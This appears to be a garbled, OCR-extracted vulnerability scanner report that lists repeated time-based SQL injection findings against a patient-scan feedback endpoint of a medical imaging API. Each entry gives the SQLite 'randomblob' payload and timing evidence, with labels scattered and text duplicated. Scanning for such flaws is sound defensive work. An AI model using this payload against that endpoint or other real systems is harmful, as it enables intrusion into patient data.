> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [522] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,683] milliseconds, when the original unmodified query with value [222] took

[1,999] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [522] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,683] milliseconds, when the original unmodified query with value [222] took

[1,999] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(1000000) when not null then 1 else 1 end Attack

Evidence

Evidence

Other

Info

Other Info

Attack

Evidence

Other Info

Evidence

Other Info

URL

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [738] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,633] milliseconds, when the original unmodified query with value [115] took [1,164] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [738] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,633] milliseconds, when the original unmodified query with value [115] took [1,164] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [755] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,304] milliseconds, when the original unmodified query with value [4] took [1,552] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [755] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,304] milliseconds, when the original unmodified query with value [4] took [1,552] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [766] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,157] milliseconds, when the original unmodified query with value [168] took [1,415] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [766] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,157] milliseconds, when the original unmodified query with value [168] took [1,415] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [775] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,382] milliseconds, when the original unmodified query with value [139] took [1,439] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [775] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,382] milliseconds, when the original unmodified query with value [139] took [1,439] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [781] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

request to take [1,047] milliseconds, when the original unmodified guery with value [283] took [1,891] milliseconds.

The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [781] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,047] milliseconds, when the original unmodified query with value [283] took

[1,891] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [825] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,000] milliseconds, when the original unmodified query with value [849] took

[1,541] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [825] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,000] milliseconds, when the original unmodified query with value [849] took [1,541] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(1000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [848] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,763] milliseconds, when the original unmodified query with value [186] took

[1,147] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [848] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,763] milliseconds, when the original unmodified query with value [186] took

[1,147] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [851] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,129] milliseconds, when the original unmodified query with value [227] took

[1,164] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [851] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,129] milliseconds, when the original unmodified query with value [227] took

[1,164] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [856] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [862] milliseconds, when the original unmodified query with value [222] took

[2,450] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not

Other Info

Evidence

Other

Info

Evidence

Other Info

Evidence

Other Info

Other Info

null then 1 else 1 end], which caused the request to take [856] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [862] milliseconds, when the original unmodified query with value [222] took

[2,450] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [864] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,324] milliseconds, when the original unmodified query with value [166] took

[3,498] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [864] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,324] milliseconds, when the original unmodified query with value [166] took [3,498] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [871] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,366] milliseconds, when the original unmodified query with value [186] took

[2,154] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [871] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,366] milliseconds, when the original unmodified query with value [186] took

[2,154] milliseconds.

Method

POST

Attack

case randomblob(1000000) when not null then 1 else 1 end

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Evidence

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [897] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,240] milliseconds, when the original unmodified query with value [242] took

[1,721] milliseconds.

Other

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [897] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,240] milliseconds, when the original unmodified query with value [242] took [1,721] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(1000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [971] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,576] milliseconds, when the original unmodified query with value [711] took

[1,484] milliseconds.

The query time is controllable using parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [971] milliseconds, parameter

Other

Evidence

URL

Info

Info value [case randomblob(10000000) when not null then 1 else 1 end], which caused the

request to take [1,576] milliseconds, when the original unmodified query with value [711]

took [1,484] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,014] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,080] milliseconds, when the original unmodified query with

value [548] took [792] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,014] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,080] milliseconds, when the original unmodified query with

value [548] took [792] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,069] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,024] milliseconds, when the original unmodified query with

value [130] took [3,016] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,069] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,024] milliseconds, when the original unmodified query with

value [130] took [3,016] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,074] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,416] milliseconds, when the original unmodified query with

value [210] took [4,552] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,074] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,416] milliseconds, when the original unmodified query with

value [210] took [4,552] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,074] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,688] milliseconds, when the original unmodified query with

value [178] took [2,070] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,074] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,688] milliseconds, when the original unmodified query with

value [178] took [2,070] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,116] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,810] milliseconds, when the original unmodified query with

value [234] took [1,789] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,116] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,810] milliseconds, when the original unmodified query with

value [234] took [1,789] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Other

Evidence

Other

Other

Evidence

Other

Info

Info

Info

Info

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,192] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,330] milliseconds, when the original unmodified query with

value [230] took [889] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,192] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,330] milliseconds, when the original unmodified query with

value [230] took [889] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,202] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,503] milliseconds, when the original unmodified query with

value [237] took [772] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,202] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,503] milliseconds, when the original unmodified query with

value [237] took [772] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,227] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,960] milliseconds, when the original unmodified query with

value [278] took [1,273] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,227] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,960] milliseconds, when the original unmodified query with

value [278] took [1,273] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor-feedback

Method POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,283] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,150] milliseconds, when the original unmodified query with value [132] took [2,119] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,283] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [3,150] milliseconds, when the original unmodified query with value [132] took [2,119] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

not null then 1 else 1 end], which caused the request to take [1,295] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,845] milliseconds, when the original unmodified query with value [222] took [3,364] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,295] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,845] milliseconds, when the original unmodified query with value [222] took [3,364] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

URL

POST

Attack

Evidence

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,320] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,768] milliseconds, when the original unmodified query with value [161] took [798] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,320] milliseconds, parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,768] milliseconds, when the original unmodified query with value [161] took [798] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,321] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,450] milliseconds, when the original upmodified query with

Evidence

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,459] milliseconds, when the original unmodified query with value [205] took [771] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,321] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,459] milliseconds, when the original unmodified query with value [205] took [771] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,329] milliseconds,

Evidence

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,659] milliseconds, when the original unmodified query with value [152] took [3,290] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,329] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,659] milliseconds, when the original unmodified query with value [152] took [3,290] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,365] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,016] milliseconds, when the original unmodified query with

value [147] took [1,118] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,365] milliseconds. parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,016] milliseconds, when the original unmodified query with value [147] took [1,118] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,393] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,616] milliseconds, when the original unmodified query with

value [580] took [1,144] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,393] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,616] milliseconds, when the original unmodified query with value [580] took [1,144] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,429] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

Evidence

caused the request to take [2,162] milliseconds, when the original unmodified query with value [208] took [2,447] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,429] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,162] milliseconds, when the original unmodified query with value [208] took [2,447] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Method

POST

Attack

case randomblob(10000000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,480] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,810] milliseconds, when the original unmodified query with

value [325.8758111691942] took [2,008] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,480] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,810] milliseconds, when the original unmodified query with value [325.8758111691942] took [2,008] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,539] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [1,769] milliseconds, when the original unmodified query with

value [188] took [2,718] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,539] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,769] milliseconds, when the original unmodified query with

value [188] took [2,718] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Other

Evidence

Other

Other

Evidence

Info

Info

Info

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,551] milliseconds,

> parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,072] milliseconds, when the original unmodified guery with

value [344] took [1,963] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,551] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,072] milliseconds, when the original unmodified query with

value [344] took [1,963] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,570] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Evidence caused the request to take [2,352] milliseconds, when the original unmodified query with

value [205] took [2,342] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,570] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [2,352] milliseconds, when the original unmodified query with

value [205] took [2,342] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,597] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,940] milliseconds, when the original unmodified query with value [198] took [2,227] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,597] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

Other

Info caused the request to take [2,940] milliseconds, when the original unmodified query with

value [198] took [2,227] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,614] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which Evidence

caused the request to take [1,643] milliseconds, when the original unmodified query with

value [139] took [931] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,614] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [1,643] milliseconds, when the original unmodified query with

value [139] took [931] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,720] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [4,469] milliseconds, when the original unmodified query with

value [81] took [2,517] milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,720] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,469] milliseconds, when the original unmodified query with

value [81] took [2,517] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(10000000) when not null then 1 else 1 end Attack

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,806] milliseconds,

Evidence parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,024] milliseconds, when the original unmodified query with

value [232] took [823] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,806] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [2,024] milliseconds, when the original unmodified query with

value [232] took [823] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [1,912] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,053] milliseconds, when the original unmodified query with

value [230] took [2,664] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [1,912] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,053] milliseconds, when the original unmodified query with

value [230] took [2,664] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

Evidence

Other

Info

Other Info

Other Info

Evidence

Other Info

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,022] milliseconds,

> parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [5,255] milliseconds, when the original unmodified query with

value [200] took [763] milliseconds.

The guery time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,022] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [5,255] milliseconds, when the original unmodified query with

value [200] took [763] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,032] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

> caused the request to take [3,774] milliseconds, when the original unmodified query with

value [210] took [923] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when

not null then 1 else 1 end], which caused the request to take [2,032] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,774] milliseconds, when the original unmodified query with

value [210] took [923] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,099] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [5,008] milliseconds, when the original unmodified query with value [249] took [280] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,099] milliseconds,

parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,008] milliseconds, when the original unmodified query with

value [249] took [280] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,117] milliseconds,

> parameter value [case randomblob(100000000) when not null then 1 else 1 end], which

caused the request to take [3,777] milliseconds, when the original unmodified query with

value [1095] took [1,532] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,117] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,777] milliseconds, when the original unmodified query with

value [1095] took [1,532] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(10000000) when not null then 1 else 1 end Attack

Evidence

Other

Info

Evidence

Other Info

Attack

Evidence

Other Info

Evidence

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,134] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,899] milliseconds, when the original unmodified query with value [213] took [1,594] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,134] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [4,899] milliseconds, when the original unmodified query with value [213] took [1,594] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,225] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,559] milliseconds, when the original unmodified query with

value [220] took [773] milliseconds.

The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,225] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [3,559] milliseconds, when the original unmodified query with value [220] took [773] milliseconds.

Other Info

URL

Evidence

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(10000000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(10000000) when not null then 1 else 1 end], which caused the request to take [2,670] milliseconds, parameter value [case randomblob(100000000) when not null then 1 else 1 end], which caused the request to take [5,784] milliseconds, when the original unmodified query with

value [37] took [1,782] milliseconds.

